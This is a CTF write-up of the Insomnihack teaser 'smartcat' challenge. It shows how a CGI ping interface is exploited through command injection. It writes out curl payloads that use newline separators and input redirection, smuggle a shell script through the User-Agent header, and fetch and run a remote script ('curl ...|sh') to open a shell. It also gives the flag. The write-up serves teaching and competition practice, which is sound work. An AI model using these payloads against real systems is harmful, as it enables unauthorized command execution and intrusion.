Outils pour utilisateurs

Outils du site


smartcat - Writeup by Maxima


Damn it, that stupid smart cat litter is broken again

Now only the debug interface is available here and this stupid thing only permits one ping to be sent!

I know my contract number is stored somewhere on that interface but I can't find it and this is the only available page! Please have a look and get this info for me !

FYI No need to bruteforce anything there. If you do you'll be banned permanently



The web interface allows you to ping a domain name. This is the most basic example of shell injection. We can guess that the server runs something like ping -c 1 $dest. We will inject a separator to execute another shell command. I first tried:

google.com; ls
google.com | ls

But I got a Bad character error. It looks like some characters are forbidden. I finally found out that \n is allowed, so I could execute a space-free command using:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Als'

That is nice! I also had the idea of using < − which is not blacklisted − to display the content of a file:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Acat<index.cgi'

The next step is to get a shell. My idea was to use sh</tmp/myfile, but I first needed a way to write in a file. I finally found the command env that prints all environment variables.

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Aenv'

Because the server uses CGI, we have special environment variables containing the request parameters. We can use the user agent to inject a shell command:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv'

It returns:

HTTP_USER_AGENT=xxx echo Powned; exit 0

It is a perfectly well formed shell script! Now we can basically execute any command using:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv>/tmp/pony7%0Ash</tmp/pony7'

Now it's easy to get the first flag:

find .
cat there/is/your/flag/or/maybe/not/what/do/you/think/really/please/tell/me/seriously/though/here/is/the/flag

For the second one, I used curl arthaud.me/sh|sh that gives me a real shell on my server. Then:

$ /home/smartcat/readflag
Almost there... just trying to make sure you can execute arbitrary commands....
Write 'Give me a...' on my stdin, wait 2 seconds, and then write '... flag!'.
Do not include the quotes. Each part is a different line.
$ (echo "Give me a..."; sleep 2; echo "... flag!"; cat) | /home/smartcat/readflag
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
        |`._`n'_.'|  hjw

INS{shells_are _way_better_than_cats}


Maxime Arthaud 2016/01/17 21:56

ctf/public/insomnihack-teaser/smartcat.txt · Dernière modification: 2016/10/15 20:11 par arthaum